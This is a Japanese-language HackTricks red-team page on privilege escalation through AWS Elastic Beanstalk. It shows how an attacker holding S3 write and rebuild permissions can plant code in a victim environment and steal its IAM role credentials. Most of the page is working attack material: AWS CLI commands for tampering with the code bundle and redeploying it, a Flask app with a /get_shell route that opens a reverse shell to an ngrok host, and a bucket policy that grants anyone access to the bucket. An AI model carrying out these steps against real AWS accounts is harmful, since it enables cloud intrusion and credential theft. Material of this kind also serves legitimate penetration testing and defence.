htARTE(HackTricks AWS Red Team Expert) を通じて、ゼロからヒーローまでAWSハッキングを学ぶ ! Elastic Beanstalk
Elastic Beanstalk に関する詳細情報 は以下を参照してください:
page AWS - Elastic Beanstalk Enum Beanstalk で機密操作を実行するには、多くの異なるサービスで多くの機密権限 が必要です。例えば、arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk
elasticbeanstalk:RebuildEnvironment、S3 書き込み権限&その他多数
環境のコードを含むS3バケットに書き込み権限 と、アプリケーションを再構築 する権限(elasticbeanstalk:RebuildEnvironment および S3、EC2、Cloudformation に関連する数種類の権限が必要)を持っていると、コードを変更 し、アプリを再構築 して次回アプリにアクセスすると、新しいコードが実行 され、攻撃者はアプリケーションとそのIAMロールの資格情報を危険にさらすことができます。
コピー # Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420 -aws-flask-app.zip
zip 1692777270420 -aws-flask-app.zip < files to zi p >
# Upload code
aws s3 cp 1692777270420 -aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name" elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, など...
上記の他にも、S3 EC2 , cloudformation autoscaling elasticloadbalancing
AWS Elastic Beanstalk アプリケーションを作成します:
コピー aws elasticbeanstalk create-application --application-name MyApp
コピー aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role 環境がすでに作成されており、新しいものを作成したくない 場合は、既存のものを更新 することができます。
アプリケーションコードと依存関係をZIPファイルにパッケージ化します:
S3 バケットにZIPファイルをアップロードします:
コピー aws s3 cp MyApp . zip s3 : // elasticbeanstalk -< region >-< accId >/ MyApp . zip
AWS Elastic Beanstalkアプリケーションバージョンを作成します:
コピー aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
AWS Elastic Beanstalk環境にアプリケーションバージョンをデプロイします:
コピー aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:SuspendProcesses
まず最初に、前の手順 に従って、被害者 で実行したいコード を含む正規のBeanstalk環境 を作成する必要があります。おそらく、これらの2つのファイル を含む単純なzip を作成します:
コピー from flask import Flask , request , jsonify
import subprocess , os , socket
application = Flask ( __name__ )
@application . errorhandler ( 404 )
def page_not_found ( e ):
return jsonify ( '404' )
@application . route ( "/" )
def index ():
return jsonify ( 'Welcome!' )
@application . route ( "/get_shell" )
def search ():
host = request . args . get ( 'host' )
port = request . args . get ( 'port' )
if host and port :
s = socket . socket (socket.AF_INET,socket.SOCK_STREAM)
s . connect ((host, int (port)))
os . dup2 (s. fileno (), 0 )
os . dup2 (s. fileno (), 1 )
os . dup2 (s. fileno (), 2 )
p = subprocess . call ([ "/bin/sh" , "-i" ])
return jsonify ( 'done' )
if __name__ == "__main__" :
application . run () 要件.txt
コピー click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1 自分のBeanstalk環境が実行 されている場合、rev shellを取得したら、それを被害者 の環境に移行 する時が来ました。そのために、Beanstalk S3バケットのBucket Policyを更新 して、被害者がアクセス できるようにする必要があります(これにより、バケットが誰でも アクセスできるようになります):
コピー {
"Version" : "2008-10-17" ,
"Statement" : [
{
"Sid" : "eb-af163bf3-d27b-4712-b795-d1e33e331ca4" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : [
"s3:ListBucket" ,
"s3:ListBucketVersions" ,
"s3:GetObject" ,
"s3:GetObjectVersion" ,
"s3:*"
] ,
"Resource" : [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" ,
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
} ,
{
"Sid" : "eb-58950a8c-feb6-11e2-89e0-0800277d041b" ,
"Effect" : "Deny" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "s3:DeleteBucket" ,
"Resource" : "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
コピー # Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"
# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host =0.tcp.eu.ngrok.io & port = 13528 ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert) ! 